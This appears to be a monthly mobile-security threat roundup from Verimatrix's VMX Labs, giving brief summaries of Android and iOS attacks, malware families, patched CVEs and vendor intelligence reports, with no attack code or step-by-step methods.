With a special focus on mobile apps and connected, unmanaged devices, this VMX Labs Cybersecurity Threat Roundup is compiled by Verimatrix cybersecurity researchers and data scientists. It includes links to notable threat advisories over the last month, information on vulnerabilities and patches, and links to recent intelligence reports.

Threat info

  • Autospill is a new attack on Android that steals login credentials while a password manager automatically fills the saved credentials into the login page loaded in WebView. WebView is a web browser embedded in native apps to render web pages. It ensures a seamless user experience. Most Android password managers are vulnerable to this attack. All password managers under test are found to be vulnerable when Javascript is enabled in WebView.
  • BLUFFS (Bluetooth Forward and Future Secrecy Attacks and Defenses) breaks Bluetooth sessions’ forward secrecy. It is composed of six different attacks exploiting architectural flaws that are independent of the hardware model and software version. Various models of iPhone, Pixel, Mi, and Galaxy smartphones are affected.
  • Chameleon Android banking trojan (ABT) has a new variant that adds Italy and the UK to its existing targets of Australia and Poland. This improved variant has modified user instructions to manually circumvent the Android 13 restricted settings countermeasure and grant Accessibility service permissions to be abused. It also implements an alternative approach to detect the foreground application, which triggers the overlay attack in the absence of Accessibility service permissions. Chameleon ABT is an active threat evolving with improved defenses.
  • Fake lockdown mode research demonstrates a proof-of-concept post-exploitation tampering technique. It enables malware to deceive victims into thinking that their iPhones are in lockdown mode.
  • Malicious ChatGPT agents can exfiltrate sensitive data in conversations to third-party servers without user consent. OpenAI has already implemented a fix for the ChatGPT web app. iOS (and probably Android) apps are not patched yet.
  • Operation Triangulation disclosed the last exploit used in the attack chain spying on the iPhones of Kaspersky security researchers. This is an undocumented hardware feature that provides direct memory access to the cache. It is still unknown how the attackers discovered this feature.
  • Smishing Triad group is a Chinese-speaking threat actor specializing in smishing. In their latest campaign, they impersonate the United Arab Emirates Federal Authority for Identity and Citizenship to steal personally identifiable information (PII) and credit card data from UAE residents and foreigners living in or visiting the country.
  • SpyLoan, a family of malicious loan apps, has surged in 2023. These apps exploit people in need with high-interest loans and spy on them to blackmail and collect the funds. It is a digital loan shark scheme that targets a broader audience by using technology. Since it is possible to access sensitive user information through mobile apps, there is always app involvement in this scheme. Some of these apps even impersonate well-known brands of financial service companies.
  • Xamalicious is an Android adware that has been downloaded more than 327,000 times from the Play Store. It abuses Android’s Accessibility service to click ads and download apps without user content. It is made with the Xamarin framework, which brings another level of obfuscation.

Vulnerabilities & patches

  • Android December security updates (2023-12-01 and 2023-12-05) patched 90+ vulnerabilities, including three zero-days (CVE-2023-33063, CVE-2023-33107, and CVE-2023-33106) actively exploited in the wild. The security patch level of 2023-12-05 or later addresses all these issues.
  • CISA adds four vulnerabilities to its known exploited vulnerabilities catalog (CVE-2023-33106, CVE-2023-33107, CVE-2023-33063, and CVE-2022-22071) after Qualcomm announced detailed information in December 2023 public bulletin. Patches of the first three zero-days were released to OEMs in October last year, and the last vulnerability was in May 2022.
  • Bluetooth stacks in Android, Linux, MacOS, and iOS are all vulnerable to the unauthenticated key injection attack under certain conditions. The underlying vulnerability (CVE-2023-45866) was fixed in Android security patch level 2023-12-05 and iOS 17.2 releases.
  • 5ghoul is a collection of 5G modem firmware vulnerabilities, of which several affect the 5G modems of Qualcomm and MediaTek. These lead to denial-of-service (DoS) and connection downgrade attacks. 626 smartphone models are found to be vulnerable, and not all vulnerabilities have been disclosed yet.
  • Apple backported the fixes for two actively exploited zero-days (CVE-2023-42916 and CVE-2023-42917) to older devices in the iOS 16.7.3 release.

Intelligence reports

  • Kaspersky’s IT threat evolution in Q3 2023 Mobile Statistics Report shows that the total number of Android banking trojan (ABT) attacks slightly increased compared to Q3 2022. It also indicates a shift towards re-using the same ABT sample against multiple targets rather than using a unique sample per target.
  • Zimperium’s annual report states that Hook, Godfather, and Teabot are the most dangerous Android banking trojans in terms of the number of banks targeted.
  • Anubis, AhMyth, and SpinOk were the top three mobile malwares in November 2023, according to Check Point’s Most Wanted Malware Report.
  • Cisco Talos’ report shows that rebooting an iOS or Android device may not eliminate the Predator spyware threat. Persistence is an optional feature of the spyware that is subject to the license bought by the customer.
  • The ESET Threat Report H2 2023 describes the threat landscape in the second half of 2023. It shows that Android malware detections increased by 22% compared to the first half of 2023.
  • Doctor Web’s November 2023 report indicates a decrease in Android malware activity compared to the previous month and the detection of over 20 malicious apps distributed via Play Store.